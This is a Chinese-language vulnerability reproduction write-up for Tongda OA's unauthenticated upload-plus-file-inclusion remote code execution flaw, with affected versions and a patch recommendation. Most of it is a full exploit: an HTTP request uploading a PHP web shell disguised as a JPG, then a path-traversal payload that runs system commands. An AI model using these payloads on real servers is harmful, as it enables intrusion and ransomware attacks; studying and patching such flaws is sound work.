0x00 概述
3月13日,通達OA在官方論壇發布通告稱,近日接到用戶反饋遭到勒索病毒攻擊,提示用戶注意安全風險,並且於同一天對所有版本發布了加固補丁。
在受影響的版本中,攻擊者可以在未認證的情況下向服務器上傳jpg圖片文件,然后包含該文件,造成遠程代碼執行。該漏洞無需登錄即可觸發。
0x01 影響版本
通達OA V11版 <= 11.3 20200103
通達OA 2017版 <= 10.19 20190522
通達OA 2016版 <= 9.13 20170710
通達OA 2015版 <= 8.15 20160722
通達OA 2013增強版 <= 7.25 20141211
通達OA 2013版 <= 6.20 20141017
0x02 環境搭建
下載安裝包一鍵安裝即可(后附環境下載鏈接)
使用默認admin/空密碼登陸
0x03 漏洞復現
該漏洞存在於以下兩個鏈接中,並且無需認證即可訪問。
任意文件上傳漏洞:/ispirit/im/upload.php
本地文件包含漏洞:/ispirit/interface/gateway.php
首先訪問/ispirit/im/upload.php,使用Payload上傳shell的.jpg文件
Payload:
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.10.128
Content-Length: 656
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB—
上傳成功后看到服務端返回的數據。上傳的文件名即為2003/504527822.jpg
然后訪問/ispirit/interface/gateway.php 鏈接,發送POST數據
json={"url":"../../../general/../attach/im/2003/504527822.jpg "}&cmd=ipconfig
系統命令執行成功。
0x04 修復建議
更新官方發布的補丁
POC地址:https://github.com/jas502n/OA-tongda-RCE
漏洞環境:https://pan.baidu.com/s/1xebepJT1SO7bjUi0JHF8aw 提取碼:1l2w